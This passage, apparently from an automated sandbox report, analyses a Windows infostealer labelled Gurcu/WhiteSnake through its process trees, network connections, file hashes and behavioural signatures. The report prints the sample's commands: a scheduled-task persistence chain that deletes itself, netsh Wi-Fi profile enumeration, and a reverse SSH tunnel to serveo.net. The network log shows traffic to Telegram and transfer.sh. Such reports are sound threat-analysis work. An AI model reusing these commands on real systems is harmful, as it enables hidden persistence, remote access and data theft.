Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6298 serveo.net

C:\Windows\system32\taskeng.exe

taskeng.exe {20093F4E-FC6E-41BE-819B-328F0E8BE865} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6298 serveo.net

Network

Country Destination Domain Proto
N/A 127.0.0.1:6298 tcp
US 8.8.8.8:53 github.com udp
US 140.82.112.3:443 github.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
FR 51.77.200.232:8080 51.77.200.232 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
N/A 127.0.0.1:6298 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.146:80 apps.identrust.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
DE 144.76.136.153:443 transfer.sh tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp

Files

memory/2972-0-0x00000000010E0000-0x0000000001104000-memory.dmp

memory/2972-1-0x000007FEF5200000-0x000007FEF5BEC000-memory.dmp

memory/2972-2-0x000000001B380000-0x000000001B400000-memory.dmp

memory/2972-5-0x000007FEF5200000-0x000007FEF5BEC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/2880-9-0x0000000001170000-0x0000000001194000-memory.dmp

memory/2880-10-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

memory/2880-11-0x000000001B410000-0x000000001B490000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/1808-126-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

memory/1808-127-0x000000001ADE0000-0x000000001AE60000-memory.dmp

C:\Users\Admin\AppData\Local\477mflh5px\port.dat

MD5 3487596cf54cb393afddaa965714ab1f
SHA1 a9abfec1f428ad27c5e83302509541ded06e3b94
SHA256 bcb05e9ef14b336689c3a2f3b2ee2a47e0a1625c8c4e333e8d24a2f95113c67f
SHA512 15afe86a97b35905e8c7b3b095199e689c1256ff3abeea14ad8db53c41ffda9e302dd4190ff5e1727e538c22dabab7e7e779a5725c5b5b81a9e3ade14667a391

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\.ssh\known_hosts

MD5 18015a60cd12f33648facec1263cfafa
SHA1 31b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA256 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512 fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

C:\Users\Admin\AppData\Local\Temp\Cab76B8.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

memory/2880-152-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar7728.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e221a78f42250fba946dc3deeb10a0d0
SHA1 8f8e77128293b691c4754ec10217279b53b76ce1
SHA256 57adae76913dda2e9c8262290f233f75607c63fda69104663f9e37d8a9232e02
SHA512 733ac3e8bb5ab3e0d694d97d4f274b84f1d633d5b683ac918be1b12027490c82bf0cc635684cb012e919bf8a38977524a4fea40d5df4d606da1e08bd8778182d

memory/2880-206-0x000000001B410000-0x000000001B490000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cf923ff543369ac8c35048cfb09ae23c
SHA1 0a3b66728c364a9408af2f05d17a917a19643056
SHA256 35b3ddc0797fafa8fe8c1c97a5378372b36ac0baa5204c197d194194764301bb
SHA512 0ee588d49d73d0695a2f2e839165f0792734b99c3f98fc8a28b1b732bb2014f5f16054e070185987796249f653d23709cdcaf75d8e633203eb3dcb898dceee44

memory/1808-224-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-13 16:16

Reported

2023-09-13 16:20

Platform

win10v2004-20230831-en

Max time kernel

143s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1304 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 1304 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 5028 wrote to memory of 4880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 5028 wrote to memory of 4880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 5028 wrote to memory of 4464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5028 wrote to memory of 4464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5028 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5028 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5028 wrote to memory of 4244 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 5028 wrote to memory of 4244 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 4244 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 4244 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 4272 wrote to memory of 900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 4272 wrote to memory of 900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 4272 wrote to memory of 2392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 4272 wrote to memory of 2392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 4272 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 4272 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 4244 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 4244 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 2600 wrote to memory of 392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 2600 wrote to memory of 392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 2600 wrote to memory of 1668 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 2600 wrote to memory of 1668 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 2600 wrote to memory of 2580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2600 wrote to memory of 2580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 4244 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 4244 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2596 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 4596 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4596 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4596 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4596 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4596 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4596 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2596 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1236 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1236 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1236 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1236 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1236 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2596 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2596 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8229 serveo.net

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

